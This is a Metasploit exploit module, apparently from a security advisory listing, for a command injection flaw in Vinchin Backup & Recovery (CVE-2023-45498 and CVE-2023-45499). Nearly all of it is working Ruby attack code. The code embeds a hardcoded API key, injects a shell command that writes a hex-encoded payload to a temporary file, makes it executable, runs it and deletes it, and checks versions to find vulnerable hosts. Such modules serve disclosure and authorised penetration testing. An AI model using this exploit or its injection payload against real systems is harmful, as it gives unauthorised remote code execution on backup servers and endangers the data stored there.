Authored by Valentin Lobstein, Gregory Boddin | Site metasploit.com

This Metasploit module exploits a command injection vulnerability in Vinchin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the checkIpExists API endpoint, an attacker can execute arbitrary commands as the web server user.

advisories | CVE-2023-45498, CVE-2023-45499

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Vinchin Backup and Recovery Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Vinchin Backup & Recovery
v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the
checkIpExists API endpoint, an attacker can execute arbitrary commands as the
web server user.
},
'License' => MSF_LICENSE,
'Author' => [
'Gregory Boddin (LeakIX)', # Vulnerability discovery
'Valentin Lobstein' # Metasploit module
],
'References' => [
['CVE', '2023-45498'],
['CVE', '2023-45499'],
['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],
['URL', 'https://vinchin.com/'] # Vendor URL
],
'DisclosureDate' => '2023-10-26',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ],
'AKA' => ['Vinchin Command Injection']
},
'Platform' => ['linux', 'unix'],
'Arch' => [ARCH_CMD],
'Targets' => [
['Automatic', {}]
],

'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true,
'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'
},
'Privileged' => false
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),
OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),
]
)
end

def exploit
hex_encoded_payload = payload.encoded.unpack('H*').first
formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\x#{x}" }.join

temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"
command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),
'vars_get' => {
'm' => '30',
'f' => 'checkIpExists',
'k' => datastore['APIKEY']
},
'data' => "p={"ip":"a||#{command}"}"
})
end

def check
target_uri_path = normalize_uri(target_uri.path, 'login.php')
res = send_request_cgi('uri' => target_uri_path)

return CheckCode::Unknown('Failed to connect to the target.') unless res
return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

version_pattern = /Vinchin build: (d+.d+.d+.d+)/
version_match = res.body.match(version_pattern)

unless version_match && version_match[1]
return CheckCode::Unknown('Unable to extract version.')
end

version = Rex::Version.new(version_match[1])
print_status("Detected Vinchin version: #{version}")

if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
(version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
(version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
(version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
return CheckCode::Appears
else
return CheckCode::Safe
end
end
end